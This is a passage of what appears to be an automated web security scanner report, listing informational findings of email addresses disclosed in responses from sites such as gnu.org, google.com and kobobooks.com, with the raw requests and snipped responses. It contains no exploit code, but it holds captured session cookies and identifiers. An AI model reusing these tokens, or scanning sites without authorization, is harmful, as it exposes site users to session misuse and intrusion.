Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2C; geo=US; s_sq=appleglobal%2Cappleusmac%3D%2526pid%253Dmac%252520-%252520index%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleusipad%3D%2526pid%253Dipad%252520-%252520ios%2525C2%2525A04%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fmac%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=48%2C48%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=mac%20-%20index%20(us);

Response

HTTP/1.1 200 OK
ntCoent-Length: 25067
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.11 (Unix)
Cache-Control: max-age=212
Expires: Thu, 03 Feb 2011 17:57:36 GMT
Date: Thu, 03 Feb 2011 17:54:04 GMT
Content-Length: 25067
Connection: close
X-N: S

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Apple
...[SNIP]...
<a href="mailto:privacy@apple.com">privacy@apple.com</a>
...[SNIP]...
<a href="mailto:privacy-ca@apple.com">privacy-ca@apple.com</a>
...[SNIP]...
<a href="mailto:privacy-la@apple.com">privacy-la@apple.com</a>
...[SNIP]...
<a href="mailto:privacyeurope@apple.com">privacyeurope@apple.com</a>
...[SNIP]...
<a href="mailto:privacy-japan@apple.com">privacy-japan@apple.com</a>
...[SNIP]...
<a href="mailto:privacy@apple.com.au">privacy@apple.com.au</a>
...[SNIP]...
<a href="mailto:privacy@asia.apple.com">privacy@asia.apple.com</a>
...[SNIP]...

23.95. http://www.cloudscan.me/search/label/CWE-89  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /search/label/CWE-89

Issue detail

The following email address was disclosed in the response:

Request

GET /search/label/CWE-89 HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.2.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:09:26 GMT
Date: Fri, 04 Feb 2011 16:09:26 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 234931

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<p style="font-family: 'Times New Roman'; font-size: medium; ">Please contact the server administrator, you@example.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p>
...[SNIP]...

23.96. http://www.cloudscan.me/search/label/DORK  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /search/label/DORK

Issue detail

The following email address was disclosed in the response:

Request

GET /search/label/DORK HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Referer: http://www.cloudscan.me/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.1.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:09:14 GMT
Date: Fri, 04 Feb 2011 16:09:14 GMT
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 227949

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<p style="font-family: 'Times New Roman'; font-size: medium; ">Please contact the server administrator, you@example.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p>
...[SNIP]...

23.97. http://www.cloudscan.me/search/label/SQL%20Injection  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudscan.me
Path:   /search/label/SQL%20Injection

Issue detail

The following email address was disclosed in the response:

Request

GET /search/label/SQL%20Injection HTTP/1.1
Host: www.cloudscan.me
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=329-1294353363818; __utmz=117772502.1294799250.4.4.utmcsr=127.0.0.1:3000|utmccn=(referral)|utmcmd=referral|utmcct=/demos/cwe-79-demo.html; blogger_TID=2c4e59d50b3eaf45; __utma=117772502.1326451636.1294353367.1294877056.1296835822.6; __utmc=117772502; __utmb=117772502.2.10.1296835822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Fri, 04 Feb 2011 16:09:26 GMT
Date: Fri, 04 Feb 2011 16:09:26 GMT
Cache-Control: public, max-age=0, must-revalidate, proxy-revalidate
Last-Modified: Fri, 04 Feb 2011 16:06:32 GMT
ETag: "65b39502-51d6-45a9-bae0-023d7d11e2d4"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 247899

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='ht
...[SNIP]...
<p style="font-family: 'Times New Roman'; font-size: medium; ">Please contact the server administrator, you@example.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p>
...[SNIP]...

23.98. http://www.dotnetnuke.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dotnetnuke.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.dotnetnuke.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74376
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: .ASPXANONYMOUS=lmQw_336ywEkAAAAOTVjYTU2OWQtZWU3OS00M2M5LWJkYjUtZmVjY2Q2YzNjZWM00; expires=Thu, 14-Apr-2011 08:28:56 GMT; path=/; HttpOnly
Set-Cookie: DotNetNukeAnonymous=2cca12b0-8ff5-438d-8695-29e972b05a1e; expires=Thu, 03-Feb-2011 22:08:56 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=lmQw_336ywEkAAAAOTVjYTU2OWQtZWU3OS00M2M5LWJkYjUtZmVjY2Q2YzNjZWM00; expires=Thu, 14-Apr-2011 08:28:56 GMT; path=/; HttpOnly
Set-Cookie: DotNetNukeAnonymous=2cca12b0-8ff5-438d-8695-29e972b05a1e; expires=Thu, 03-Feb-2011 22:08:56 GMT; path=/; HttpOnly
Set-Cookie: language=en-US; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 21:48:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<a href="mailto://sales@dnncorp.com" class="emailIcon">sales@dnncorp.com</a>
...[SNIP]...

23.99. http://www.gnu.org/licenses/gpl.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/gpl.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:19:41 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Thu, 03 Feb 2011 19:19:41 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 49695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...

23.100. http://www.gnu.org/licenses/lgpl.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gnu.org
Path:   /licenses/lgpl.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/lgpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:50:16 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Thu, 03 Feb 2011 19:50:16 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 21211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta http
...[SNIP]...
<link rev="made" href="mailto:webmasters@gnu.org" />
...[SNIP]...
<input type="text" id="frmEmail" name="email" size="15" maxlength="80" value="you@example.com" onfocus="this.value=''" />
...[SNIP]...
<a href="mailto:gnu@gnu.org"><em>gnu@gnu.org</em>
...[SNIP]...
<a href="mailto:webmasters@gnu.org"><em>webmasters@gnu.org</em>
...[SNIP]...
<!-- advise web-translators@gnu.org and add it to -->
...[SNIP]...

23.101. https://www.google.com/accounts/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/Login

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=p2zNnJZpTnA;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 03 Feb 2011 21:55:57 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10833
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

23.102. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: GALX=hB-ORbAny80;Path=/accounts;Secure
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 03 Feb 2011 21:56:03 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10831
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
<div style="color: #666666; font-size: 75%;">
ex: pat@example.com
</div>
...[SNIP]...

23.103. http://www.inceptor.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.inceptor.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.inceptor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:20:10 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:35:12 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<a href="mailto:contactus@inceptor.com">
...[SNIP]...
<a href="mailto:contactus@inceptor.com">
...[SNIP]...

23.104. http://www.jackpotcity.com/about-us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jackpotcity.com
Path:   /about-us.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /about-us.aspx HTTP/1.1
Host: www.jackpotcity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCH=JPC; FCVR=1412626858; __utmz=26101158.1296765008.1.1.utmccn=(referral)|utmcsr=thumbshots.com|utmcct=/Support.aspx|utmcmd=referral; __utma=26101158.471062058.1296765008.1296765008.1296765008.1; __utmc=26101158; __utmb=26101158; ASP.NET_SessionId=wa3qlqzjtebv1q45odolquvj;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 21:57:17 GMT
Connection: close
Content-Length: 40845
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   
All
...[SNIP]...
<a href="mailto:info@calproblemgambling.org">info@calproblemgambling.org</a>
...[SNIP]...

23.105. http://www.jackpotcity.com/js/jquery.hoverIntent.minified.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jackpotcity.com
Path:   /js/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.jackpotcity.com
Proxy-Connection: keep-alive
Referer: http://www.jackpotcity.com/online-casino/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wa3qlqzjtebv1q45odolquvj; CCH=JPC; FCVR=1412626858

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 12 Oct 2010 10:26:08 GMT
Accept-Ranges: bytes
ETag: "0e04e2f769cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:29:23 GMT
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 1820

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

23.106. http://www.kobobooks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kobobooks.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.kobobooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 22:00:45 GMT
Server: Microsoft-IIS/6.0
srv: www-13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gzhef2455v4bcx55lt11oh45; path=/; HttpOnly
Set-Cookie: scToKobo=; expires=Fri, 03-Feb-2012 22:00:45 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 657861


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<script src="//cd
...[SNIP]...
<a href="mailto:help@kobobooks.com" style="color: #c52f86;">help@kobobooks.com</a>
...[SNIP]...

23.107. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lightinthebox.com
Path:   /wholesale-Shower-Faucets_c2863

Issue detail

The following email address was disclosed in the response:

Request

GET /wholesale-Shower-Faucets_c2863 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: LITBWS/1.0.8.dev
Date: Thu, 03 Feb 2011 22:01:45 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Set-Cookie: cookie_test=please_accept_for_session; expires=Sat, 05-Mar-2011 22:01:45 GMT; path=/; domain=.lightinthebox.com
Set-Cookie: __cust=AAAAAE1LJclZoSofA3ibAg==; expires=Fri, 03-Feb-12 22:01:45 GMT; domain=lightinthebox.com; path=/
Set-Cookie: SRV=s6; path=/
Cache-control: private
Content-Length: 154109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoco
...[SNIP]...
ages/english/logo/PaypalVerify.gif" border="0" title="wholesale PaypalVerify " alt="wholesale PaypalVerify" style="cursor:pointer" onclick="javascript:window.open('https://www.paypal.com/verified/pal=order@litb-inc.com','olcwhatispaypal','toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=yes, resizable=yes, width=400, height=350');" />
...[SNIP]...

23.108. http://www.milanoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milanoo.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.milanoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: milanooId=caa4dd2ddd2fa909515c8860d4864921; path=/
Set-Cookie: milanooId=0ae3e4e9d51c2e0247e06c0bf5f350b0; path=/
Set-Cookie: lang_cookie=en-uk; expires=Sun, 31-Jan-2021 20:29:30 GMT; path=/
Set-Cookie: CurrencyCode=USD; expires=Sat, 05-Mar-2011 20:29:30 GMT; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 101594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<a href="javascript:void(0)" title="paypal" rel="nofollow" onclick="javascript:window.open('https://www.paypal.com/verified/pal=paypal@milanoo.com','olcwhatispaypal','toolbar=no, location=no, directories=no, status=no, menubar=no, scrollbars=yes, resizable=yes, width=400, height=350');">
...[SNIP]...

23.109. http://www.myservicemonster.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myservicemonster.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.myservicemonster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 15:27:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 7851
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="myservicemonster">

...[SNIP]...
<a href="mailto:contact@theumbrellacorp.net">
...[SNIP]...

23.110. http://www.oakland.edu/cdf/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oakland.edu
Path:   /cdf/x22

Issue detail

The following email address was disclosed in the response:

Request

GET /cdf/x22 HTTP/1.1
Host: www.oakland.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 03 Feb 2011 20:26:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="mailto:webmaster@oakland.edu">
...[SNIP]...

23.111. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:21:04 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6511c3d78eq0k3q224uiic1f03; expires=Sat, 26-Feb-2011 22:54:24 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 03 Feb 2011 19:16:24 GMT
ETag: "61d277c2c3aa0a9af5e36cf0f001eba2"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

23.112. http://www.orgplus.com/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orgplus.com
Path:   /x22

Issue detail

The following email address was disclosed in the response:

Request

GET /x22 HTTP/1.1
Host: www.orgplus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 00:28:12 GMT
Server: Apache/2.0.53 (Fedora)
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 12720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
